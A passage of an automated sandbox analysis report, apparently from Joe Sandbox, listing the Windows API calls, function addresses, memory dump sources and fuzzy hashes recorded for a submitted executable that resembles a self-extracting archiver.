              • Instruction Fuzzy Hash: A2F08C72800228A7CB203FA5DC0AAFA7BDCEF09B41B4001E1FC84A6151DAA0CD40DBF1

              Control-flow Graph

               Control-flow graph of the function at 00B8984E (rendered as an image in the original report; basic-block edge list not reproduced)
              APIs
              • GetStdHandle.KERNEL32(000000F6), ref: 00B8985E
              • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00B89876
              • GetLastError.KERNEL32 ref: 00B898A8
              • GetLastError.KERNEL32 ref: 00B898C7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
               • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ErrorLast$FileHandleRead
              • String ID:
              • API String ID: 2244327787-0
              • Opcode ID: 5f9b01742fee6f8542adf61761f4980065a726cfdf3455d6713e6f545837d8db
              • Instruction ID: 82e797dd25141af96f661453ef14e800e993901f71ad52c784af8f5927d1e275
              • Opcode Fuzzy Hash: 5f9b01742fee6f8542adf61761f4980065a726cfdf3455d6713e6f545837d8db
              • Instruction Fuzzy Hash: 81118230900209EFDF207B51C844A7977E8FF06BB1F1886AAF46A865A0DB759E40DF61
              APIs
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00B8CFE0,00000000,00000000,?,00BAA49B,00B8CFE0,00000000,00000000,00000000,?,00BAA698,00000006,FlsSetValue), ref: 00BAA526
              • GetLastError.KERNEL32(?,00BAA49B,00B8CFE0,00000000,00000000,00000000,?,00BAA698,00000006,FlsSetValue,00BB7348,00BB7350,00000000,00000364,?,00BA9077), ref: 00BAA532
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BAA49B,00B8CFE0,00000000,00000000,00000000,?,00BAA698,00000006,FlsSetValue,00BB7348,00BB7350,00000000), ref: 00BAA540
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
               • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID:
              • API String ID: 3177248105-0
              • Opcode ID: fecf54f2b3027c9ef3a7575364802953e51c14384b0da9c9932c70d34a8fd084
              • Instruction ID: d0db05f669563a5daaed5937c14f2dde0ec2ec4f615ca93585a6f6250a40cbe5
              • Opcode Fuzzy Hash: fecf54f2b3027c9ef3a7575364802953e51c14384b0da9c9932c70d34a8fd084
              • Instruction Fuzzy Hash: EE01F732A19226ABC7218A6C9C84A667BDCEF67FA17240664F906D7140DB31D900C6F5
              APIs
              • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00B8CC94,00000001,?,?,?,00000000,00B94ECD,?,?,?), ref: 00B89F4C
              • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00B94ECD,?,?,?,?,?,00B94972,?), ref: 00B89F8E
              • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00B8CC94,00000001,?,?), ref: 00B89FB8
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
               • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: FileWrite$Handle
              • String ID:
              • API String ID: 4209713984-0
              • Opcode ID: 02cd545ee5ee0c5e1e7c623dadfb8049ccfe4cea38ebf65809a8efadeab5445f
              • Instruction ID: 9ebcec629bfe7f4aeda2317fa26cefa817db13f4cdad89079f061c4c1d8452d7
              • Opcode Fuzzy Hash: 02cd545ee5ee0c5e1e7c623dadfb8049ccfe4cea38ebf65809a8efadeab5445f
              • Instruction Fuzzy Hash: EE31E4712083059BDF18AF14DC48B7ABBE8EF50B14F08469DF945DB1A1CB74E948CBA2
              APIs
              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00B8A113,?,00000001,00000000,?,?), ref: 00B8A22E
              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00B8A113,?,00000001,00000000,?,?), ref: 00B8A261
              • GetLastError.KERNEL32(?,?,?,?,00B8A113,?,00000001,00000000,?,?), ref: 00B8A27E
              Similarity
              • API ID: CreateDirectory$ErrorLast
              APIs
              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00BAB019
              Similarity
              • API ID: Info
              APIs
              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 00BAA79D
              Similarity
              • API ID: String
              • String ID: LCMapStringEx
              APIs
              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00BA9D2F), ref: 00BAA715
              Strings
              • InitializeCriticalSectionEx, xrefs: 00BAA6E5
              Similarity
              • API ID: CountCriticalInitializeSectionSpin
              • String ID: InitializeCriticalSectionEx
              APIs
              Similarity
              • API ID: Alloc
              • String ID: FlsAlloc
              APIs
              • try_get_function.LIBVCRUNTIME ref: 00BA32AF
              Similarity
              • API ID: try_get_function
              • String ID: FlsAlloc
              APIs
                • Part of subcall function 00BAAF1B: GetOEMCP.KERNEL32(00000000,?,?,00BAB1A5,?), ref: 00BAAF46
              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00BAB1EA,?,00000000), ref: 00BAB3C4
              • GetCPInfo.KERNEL32(00000000,00BAB1EA,?,?,?,00BAB1EA,?,00000000), ref: 00BAB3D7
              Similarity
              • API ID: CodeInfoPageValid
              APIs
              • __EH_prolog.LIBCMT ref: 00B81385
                • Part of subcall function 00B86057: __EH_prolog.LIBCMT ref: 00B8605C
                • Part of subcall function 00B8C827: __EH_prolog.LIBCMT ref: 00B8C82C
                • Part of subcall function 00B8C827: new.LIBCMT ref: 00B8C86F
                • Part of subcall function 00B8C827: new.LIBCMT ref: 00B8C893
              • new.LIBCMT ref: 00B813FE
                • Part of subcall function 00B8B07D: __EH_prolog.LIBCMT ref: 00B8B082
              Similarity
              • API ID: H_prolog
              APIs
              • __EH_prolog.LIBCMT ref: 00B81385
                • Part of subcall function 00B86057: __EH_prolog.LIBCMT ref: 00B8605C
                • Part of subcall function 00B8C827: __EH_prolog.LIBCMT ref: 00B8C82C
                • Part of subcall function 00B8C827: new.LIBCMT ref: 00B8C86F
                • Part of subcall function 00B8C827: new.LIBCMT ref: 00B8C893
              • new.LIBCMT ref: 00B813FE
                • Part of subcall function 00B8B07D: __EH_prolog.LIBCMT ref: 00B8B082
              Similarity
              • API ID: H_prolog
              APIs
                • Part of subcall function 00BA8FA5: GetLastError.KERNEL32(?,00BC0EE8,00BA3E14,00BC0EE8,?,?,00BA3713,00000050,?,00BC0EE8,00000200), ref: 00BA8FA9
                • Part of subcall function 00BA8FA5: _free.LIBCMT ref: 00BA8FDC
                • Part of subcall function 00BA8FA5: SetLastError.KERNEL32(00000000,?,00BC0EE8,00000200), ref: 00BA901D
                • Part of subcall function 00BA8FA5: _abort.LIBCMT ref: 00BA9023
                • Part of subcall function 00BAB2AE: _abort.LIBCMT ref: 00BAB2E0
                • Part of subcall function 00BAB2AE: _free.LIBCMT ref: 00BAB314
                • Part of subcall function 00BAAF1B: GetOEMCP.KERNEL32(00000000,?,?,00BAB1A5,?), ref: 00BAAF46
              • _free.LIBCMT ref: 00BAB200
              • _free.LIBCMT ref: 00BAB236
              Similarity
              • API ID: _free$ErrorLast_abort
              APIs
              • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00B89EDC,?,?,00B87867), ref: 00B897A6
              • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00B89EDC,?,?,00B87867), ref: 00B897DB
              Similarity
              • API ID: CreateFile
              APIs
              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00B87547,?,?,?,?), ref: 00B89D7C
              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00B89E2C
              Similarity
              • API ID: File$BuffersFlushTime
              APIs
              • GetProcAddress.KERNEL32(00000000,00BB3958), ref: 00BAA4B8
              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BAA4C5
              Similarity
              • API ID: AddressProc__crt_fast_encode_pointer
              APIs
              • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00B89B35,?,?,00000000,?,?,00B88D9C,?), ref: 00B89BC0
              • GetLastError.KERNEL32 ref: 00B89BCD
              Similarity
              • API ID: ErrorFileLastPointer
              APIs
              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00B89E76
              • GetLastError.KERNEL32 ref: 00B89E82
              Similarity
              • API ID: ErrorFileLastPointer
              APIs
              • _free.LIBCMT ref: 00BA8627
                • Part of subcall function 00BA8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BAC13D,00000000,?,00BA67E2,?,00000008,?,00BA89AD,?,?,?), ref: 00BA854A
              • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00BC0F50,00B8CE57,?,?,?,?,?,?), ref: 00BA8663
              Similarity
              • API ID: Heap$AllocAllocate_free
              APIs
              • GetCurrentProcess.KERNEL32(?,?), ref: 00B90915
              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00B9091C
              Similarity
              • API ID: Process$AffinityCurrentMask
              APIs
              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B8A27A,?,?,?,00B8A113,?,00000001,00000000,?,?), ref: 00B8A458
              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B8A27A,?,?,?,00B8A113,?,00000001,00000000,?,?), ref: 00B8A489
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: cf404ef89b8cbe93e13878bd533b8eafe20946295ff70f7b424435dc8286e279
              • Instruction ID: 6bd9e77d5b6f68767c7ca07111ca3dda37426ba28082d0ec1d2cb5dc06a9a631
              • Opcode Fuzzy Hash: cf404ef89b8cbe93e13878bd533b8eafe20946295ff70f7b424435dc8286e279
              • Instruction Fuzzy Hash: F4F082312402097BDF016E60DC85FD9779CAF04781F488091BC4886171DB7199A8EB50
              APIs
              Similarity
              • API ID: ItemText_swprintf
              • String ID:
              • API String ID: 3011073432-0
              • Opcode ID: a548c4b440cfff051cd35b91ad41c7e74de89dac0fef55b8a317ea610085ba74
              • Instruction ID: b22339a533a8f6ab8e5ea596372a9b7d148b809b81cb8931040afe33bb02146d
              • Opcode Fuzzy Hash: a548c4b440cfff051cd35b91ad41c7e74de89dac0fef55b8a317ea610085ba74
              • Instruction Fuzzy Hash: D5F0E5716043487BEF11BBB0DC07FAE379CEB08746F0405E6B601A71B2DE716A608762
              APIs
              • DeleteFileW.KERNELBASE(?,?,?,00B8984C,?,?,00B89688,?,?,?,?,00BB1FA1,000000FF), ref: 00B8A13E
              • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00B8984C,?,?,00B89688,?,?,?,?,00BB1FA1,000000FF), ref: 00B8A16C
              Similarity
              • API ID: DeleteFile
              • String ID:
              • API String ID: 4033686569-0
              • Opcode ID: 2f1ff3801d5c3b9562ea536c14a195369a576c70321f4c962035525f732cde41
              • Instruction ID: 510b6f24dbb6f19d1caf53405d11fd2296d74b6a0f0374194afbb76d99fe09be
              • Opcode Fuzzy Hash: 2f1ff3801d5c3b9562ea536c14a195369a576c70321f4c962035525f732cde41
              • Instruction Fuzzy Hash: 64E06535545208A7EB11BA60DC45FE977DCAF05781F8440A5B98493064DB61ED94DB50
              APIs
              • GdiplusShutdown.GDIPLUS(?,?,?,?,00BB1FA1,000000FF), ref: 00B9A3D1
              • CoUninitialize.COMBASE(?,?,?,?,00BB1FA1,000000FF), ref: 00B9A3D6
              Similarity
              • API ID: GdiplusShutdownUninitialize
              • String ID:
              • API String ID: 3856339756-0
              • Opcode ID: 27ca58fbaafa80e7155919e2559cb7accaeba812fc3bbe669be078471294fbd5
              • Instruction ID: 89dac15c90dc634221a967f05f62645f31057d5371d25b9c38dfec777fb32964
              • Opcode Fuzzy Hash: 27ca58fbaafa80e7155919e2559cb7accaeba812fc3bbe669be078471294fbd5
              • Instruction Fuzzy Hash: C6F01532A18A54EFC6149B4CDC45B59FBA8FB89A20F0443AAA41993760CBB4A800CA91
              APIs
              • GetFileAttributesW.KERNELBASE(?,?,?,00B8A189,?,00B876B2,?,?,?,?), ref: 00B8A1A5
              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00B8A189,?,00B876B2,?,?,?,?), ref: 00B8A1D1
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: aa08f65afd3470062be8ea169dd59c423657ca293a2dd4825a0e1a48d275516b
              • Instruction ID: 42019a47f01620e3f4d736190263423003b539f4de47b7b12397d1217ffe0039
              • Opcode Fuzzy Hash: aa08f65afd3470062be8ea169dd59c423657ca293a2dd4825a0e1a48d275516b
              • Instruction Fuzzy Hash: 75E06D35500128ABDB21BA68DC09BD9B7D8EB097A1F0042A2BD54E32A0DBB09D449BE0
              APIs
              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B900A0
              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B8EB86,Crypt32.dll,00000000,00B8EC0A,?,?,00B8EBEC,?,?,?), ref: 00B900C2
              Similarity
              • API ID: DirectoryLibraryLoadSystem
              • String ID:
              • API String ID: 1175261203-0
              • Opcode ID: 2b01d4c0630c2dde88be4b334d0814f49375d6c3007416d53ec92f549270adb5
              • Instruction ID: 80891b7cb13214cf725cc2d2177114d33af7b3c01cb3a9907ea56fbfa2e5c0f2
              • Opcode Fuzzy Hash: 2b01d4c0630c2dde88be4b334d0814f49375d6c3007416d53ec92f549270adb5
              • Instruction Fuzzy Hash: B7E0127691112C6BDB21AAA4DC05FD677ECEF09782F4400A6B948D3114DAB4DA44CBA4
              APIs
              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B99B30
              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00B99B37
              Similarity
              • API ID: BitmapCreateFromGdipStream
              • String ID:
              • API String ID: 1918208029-0
              • Opcode ID: f9ffea687d1dd44c37cdb9a91aeda54c72deef8dc4542236d06b95794c92d969
              • Instruction ID: 782f5f7403bb6184fdb9d30734b0a42ab2d49c3f6f65209a2eff0250172b55a3
              • Opcode Fuzzy Hash: f9ffea687d1dd44c37cdb9a91aeda54c72deef8dc4542236d06b95794c92d969
              • Instruction Fuzzy Hash: B6E0ED72901218EBCB50DF98D5416A9B7ECEB08721F1080AFE89593301E7B5AE049B91
              APIs
                • Part of subcall function 00BA329A: try_get_function.LIBVCRUNTIME ref: 00BA32AF
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BA217A
              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00BA2185
              Similarity
              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
              • String ID:
              • API String ID: 806969131-0
              • Opcode ID: 88ea9314ad1b6c2c5288d1821aa8db130af75b4bb22b2c8fcc5c92575bfcf0e9
              • Instruction ID: 76c941e68839d8bb97ff976d519484d8b3c4f6b719ae978648fd907f02545d37
              • Opcode Fuzzy Hash: 88ea9314ad1b6c2c5288d1821aa8db130af75b4bb22b2c8fcc5c92575bfcf0e9
              • Instruction Fuzzy Hash: 3CD0C935A4C346286D6827BCA8925A923C49953FB53F00BC6F731AA4E2EE618145A511
              APIs
              • DloadLock.DELAYIMP ref: 00B9DC73
              • DloadProtectSection.DELAYIMP ref: 00B9DC8F
                • Part of subcall function 00B9DE67: DloadObtainSection.DELAYIMP ref: 00B9DE77
              Similarity
              • API ID: Dload$Section$LockObtainProtect
              • String ID:
              • API String ID: 731663317-0
              • Opcode ID: 2ac86863da25e447fbaa6549f9400e591500e092a165c7ac19b6a7e9587960a2
              • Instruction ID: 25e3e617ebde3a0b6463f34cc6a74c45d9ac9126a798a480f192295e92200576
              • Opcode Fuzzy Hash: 2ac86863da25e447fbaa6549f9400e591500e092a165c7ac19b6a7e9587960a2
              • Instruction Fuzzy Hash: 74D0C9741102805ACE25BB56998672C22F0F724744FB406E1A1058B2A1DFE484E2C616
              APIs
              Similarity
              • API ID: ItemShowWindow
              • String ID:
              • API String ID: 3351165006-0
              • Opcode ID: 2240e7e6ef6b1a296ddba2f1d44014e2d02a4e39fe779fc050c0be194bf5da1f
              • Instruction ID: e9f682c76115d47f986ed94e02df9a53bd10a61263ec47d697cb8894de782102
              • Opcode Fuzzy Hash: 2240e7e6ef6b1a296ddba2f1d44014e2d02a4e39fe779fc050c0be194bf5da1f
              • Instruction Fuzzy Hash: 23C01232058284BECB010BB0DD09D2FBBACABA4212F05C908B2A5D2060CA38C110DB12
              APIs
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 3243fc64fe2691c23dac69408784e7f85ee0abee10328fa7c7837dfd75eb5a66
              • Instruction ID: f5b78cefc8433aaee46d510dcb434748b319c606f6ea6484305c885e0687c9c4
              • Opcode Fuzzy Hash: 3243fc64fe2691c23dac69408784e7f85ee0abee10328fa7c7837dfd75eb5a66
              • Instruction Fuzzy Hash: 7AC18170A062449FEF15EF6CC484BA97BE9EF05300F0848F9DC469F2A6DB719946CB61
              APIs
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 18c16a5cecabc7c58db07c9f30218900dedcab8881e02b249ecf8d9364d417fb
              • Instruction ID: 30c5b67eaf6a899741c19369cbb9a1e987930f144601666c1a1bca33767c2f47
              • Opcode Fuzzy Hash: 18c16a5cecabc7c58db07c9f30218900dedcab8881e02b249ecf8d9364d417fb
              • Instruction Fuzzy Hash: 0471F271104F44AEDB25EB74CC81AE7B7E8EF14B01F4449AEE1AB47262DB316A48CF10
              APIs
              • __EH_prolog.LIBCMT ref: 00B88384
                • Part of subcall function 00B81380: __EH_prolog.LIBCMT ref: 00B81385
                • Part of subcall function 00B81380: new.LIBCMT ref: 00B813FE
                • Part of subcall function 00B819A6: __EH_prolog.LIBCMT ref: 00B819AB
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 63c6062027d2366ef5daa1f7adab26047e0d5245a6ab0ec4371cc437fcc6bec8
              • Instruction ID: 60f22c44d763459392882374779596119166855b3f3f8cbac5237ecb605e49be
              • Opcode Fuzzy Hash: 63c6062027d2366ef5daa1f7adab26047e0d5245a6ab0ec4371cc437fcc6bec8
              • Instruction Fuzzy Hash: A34191328406589BDF24FB60C855BEA73ECEF50300F4844EAE58AA31A2DF745AC9DB50
              APIs
              • __EH_prolog.LIBCMT ref: 00B81E05
                • Part of subcall function 00B83B3D: __EH_prolog.LIBCMT ref: 00B83B42
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 3918f6e643ae49b47bc14d8ccc3bc28d6df607fe3a17b53fc4a05c546902b188
              • Instruction ID: dbe5b8f26814f58cad179eb6809a600577a23d59264aac0ed6f37f0ce481cfa2
              • Opcode Fuzzy Hash: 3918f6e643ae49b47bc14d8ccc3bc28d6df607fe3a17b53fc4a05c546902b188
              • Instruction Fuzzy Hash: 0D213772905109AFCF11EF98D9519EEBBFAFF58300B1008AEE845B7261CB325E11DB60
              APIs
              • __EH_prolog.LIBCMT ref: 00B9A7C8
                • Part of subcall function 00B81380: __EH_prolog.LIBCMT ref: 00B81385
                • Part of subcall function 00B81380: new.LIBCMT ref: 00B813FE
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 692ab44032323bfec73e39bcc426a7acbaaa651f937e82cbc2ec8026e6e5048d
              • Instruction ID: 38445d835ccdad5e3cdd2cb8d114e92dbad6bf61dd2defa77c4d356cc2ab639a
              • Opcode Fuzzy Hash: 692ab44032323bfec73e39bcc426a7acbaaa651f937e82cbc2ec8026e6e5048d
              • Instruction Fuzzy Hash: E6214F71C05249AECF15EF58C9925EEB7F8EF19300F1004EEE809A7252D735AE06DBA1
              APIs
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 9e14ad0473bf48053e6c686a17b5fef209d03534294ce7eb011b678b6425ba92
              • Instruction ID: 6869847a8cd98e757817c51327ac40475487460d6faff4bab1e6814415fc503f
              • Opcode Fuzzy Hash: 9e14ad0473bf48053e6c686a17b5fef209d03534294ce7eb011b678b6425ba92
              • Instruction Fuzzy Hash: 07118E73A005289BCF26BBA8CC519EEBBB6EF88750F0441A5F814B7261CA34CD10C7A4
              APIs
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
              • Instruction ID: d4ec492dd918e0b1d9975c1b6fc8855b0b01e39e5a9a07d823ea556542999e90
              • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
              • Instruction Fuzzy Hash: 64F0AF30500B059FEB38EF74C981616B7E8EB11330F20899FE496C3AA0E770D881C752
              APIs
              • __EH_prolog.LIBCMT ref: 00B85BDC
                • Part of subcall function 00B8B07D: __EH_prolog.LIBCMT ref: 00B8B082
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: cf9da97dd0bc2ddefb78234fd1b5ab1bdd1a9c587097187751fad8e44ec8f826
              • Instruction ID: 4b7ccd8dfe7fa0d608d2ef9b1f8adbbd56961d63899db36fe98dfeffa552e625
              • Opcode Fuzzy Hash: cf9da97dd0bc2ddefb78234fd1b5ab1bdd1a9c587097187751fad8e44ec8f826
              • Instruction Fuzzy Hash: A601D130A10688DAC724F7B8C0157EDFBE49F19301F4040EDA85A132A3CFB01B09C762
              APIs
              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BAC13D,00000000,?,00BA67E2,?,00000008,?,00BA89AD,?,?,?), ref: 00BA854A
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 4e8d367f5163b59462c4f68932594ffd80f0b124d0bead03955862edaff2cea2
              • Instruction ID: ebee6c03b07c10c7b7c4ed53991871643978af2786fb2a6cb158b6ef2a7f9053
              • Opcode Fuzzy Hash: 4e8d367f5163b59462c4f68932594ffd80f0b124d0bead03955862edaff2cea2
              • Instruction Fuzzy Hash: 90E0E531D8C2615BEB312A699C01B9E3BCCDF637B0F1406A0AC58A6880CE20CC0045E5
              APIs
              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B8A4F5
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: CloseFind
              • String ID:
              • API String ID: 1863332320-0
              • Opcode ID: 97c0366397320b324aa8a963e3a2ceec03af764e6aa507ea0e4f391e68c88c19
              • Instruction ID: 2a14d166d9801e3bdafb43f29690f71276d680ceaf8da3446487083e26219aa2
              • Opcode Fuzzy Hash: 97c0366397320b324aa8a963e3a2ceec03af764e6aa507ea0e4f391e68c88c19
              • Instruction Fuzzy Hash: 2AF05435409780AADA227B7888047D67BD1AF16371F04CA8AF5F9121A1C6B554D5D723
              APIs
              • SetThreadExecutionState.KERNEL32(00000001), ref: 00B906B1
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ExecutionStateThread
              • String ID:
              • API String ID: 2211380416-0
              • Opcode ID: 6a09e5b414f615d22f702cf34d4ef0bfca7ceb1c43afca6df4bedbc3405546cf
              • Instruction ID: 0a6738bfb5463a878eaa3a958dfc5dfae4e63e60a24a24b47aa1f9b06a6c1e5b
              • Opcode Fuzzy Hash: 6a09e5b414f615d22f702cf34d4ef0bfca7ceb1c43afca6df4bedbc3405546cf
              • Instruction Fuzzy Hash: 68D02B212280107ACE21332CA805BFE1BD64FC3711F0900F9B00D135D38F4608C7A3E2
              APIs
              • GdipAlloc.GDIPLUS(00000010), ref: 00B99D81
                • Part of subcall function 00B99B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B99B30
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Gdip$AllocBitmapCreateFromStream
              • String ID:
              • API String ID: 1915507550-0
              • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
              • Instruction ID: a6ea165bf9ec9ece6dbce2d658af5ac3f368aadbfe50c141805393751907c6c6
              • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
              • Instruction Fuzzy Hash: 73D0C73065520D7ADF81BF799C4297A7BE9DF11350F1081B9BD0886152ED72DE10A661
              APIs
              • GetFileType.KERNELBASE(000000FF,00B89887), ref: 00B89995
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
